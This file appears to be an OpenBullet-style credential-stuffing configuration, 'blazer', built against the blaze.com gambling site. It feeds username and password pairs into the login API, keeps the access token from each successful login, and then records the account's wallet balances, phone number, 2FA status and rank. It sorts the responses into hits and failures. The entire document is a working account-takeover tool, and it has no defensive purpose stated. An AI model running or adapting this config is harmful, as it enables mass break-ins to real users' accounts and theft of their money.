[SETTINGS]
{
  "Name": "blazer",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-05-13T14:55:23.4500745-03:00",
  "AdditionalInfo": "",
  "Author": "",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 200,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "Config by /Kyan#0001",
      "VariableName": "Config by /Kyan#0001",
      "Id": 18606716
    }
  ],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": true,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": true,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST PUT "https://blaze.com/api/auth/password" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json; charset=utf-8" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "content-length: 64" 
  HEADER "content-type: application/json;charset=UTF-8" 
  HEADER "cookie: _ga=GA1.2.2028289077.1652461307; _gid=GA1.2.261537999.1652461307; __zlcmid=19xkvFY6WRYJTw1" 
  HEADER "origin: https://blaze.com" 
  HEADER "referer: https://blaze.com/pt/?modal=auth&tab=login" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Opera GX\";v=\"85\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "x-client-language: pt" 
  HEADER "x-client-version: 8958dd8a" 

PARSE "<SOURCE>" JSON "access_token" -> VAR "TOKEN" 

REQUEST GET "https://blaze.com/api/wallets" 
  
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "authorization: Bearer <TOKEN>" 
  HEADER "cookie: _ga=GA1.2.2028289077.1652461307; _gid=GA1.2.261537999.1652461307; __zlcmid=19xkvFY6WRYJTw1; _gat=1" 
  HEADER "referer: https://blaze.com/pt/?menu=account" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Opera GX\";v=\"85\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "x-client-language: pt" 
  HEADER "x-client-version: 8958dd8a" 

PARSE "<SOURCE>" JSON "balance" CreateEmpty=FALSE -> CAP "Saldo" 

PARSE "<SOURCE>" JSON "bonus_balance" CreateEmpty=FALSE -> CAP "Bonus:" 

PARSE "<SOURCE>" JSON "real_balance" CreateEmpty=FALSE -> CAP "Real:" 

REQUEST GET "https://blaze.com/api/users/me" 
  
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "authorization: Bearer <TOKEN>" 
  HEADER "referer: https://blaze.com/pt/?menu=account" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Opera GX\";v=\"85\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "x-client-language: pt" 
  HEADER "x-client-version: 8958dd8a" 

PARSE "<SOURCE>" JSON "locale" CreateEmpty=FALSE -> CAP "Região:" 

PARSE "<SOURCE>" JSON "two_factor_enabled" CreateEmpty=FALSE -> CAP "2FA:" 

PARSE "<SOURCE>" JSON "phone_number" CreateEmpty=FALSE -> CAP "Numero:" 

PARSE "<SOURCE>" JSON "phone_number_confirmed" CreateEmpty=FALSE -> CAP "Numero Verificado?:" 

REQUEST GET "https://blaze.com/api/users/me/xp" 
  
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "authorization: Bearer <TOKEN>" 
  HEADER "cookie: _ga=GA1.2.2028289077.1652461307; _gid=GA1.2.261537999.1652461307; __zlcmid=19xkvFY6WRYJTw1; _gat=1" 
  HEADER "referer: https://blaze.com/pt/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Opera GX\";v=\"85\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "x-client-language: pt" 
  HEADER "x-client-version: 8958dd8a" 

PARSE "<SOURCE>" JSON "level" CreateEmpty=FALSE -> CAP "Level:" 

PARSE "<SOURCE>" JSON "rank" CreateEmpty=FALSE -> CAP "Rank:" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "200" 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "422" 
    KEY "<RESPONSECODE>" Contains "401" 
    KEY "<RESPONSECODE>" Contains "451" 

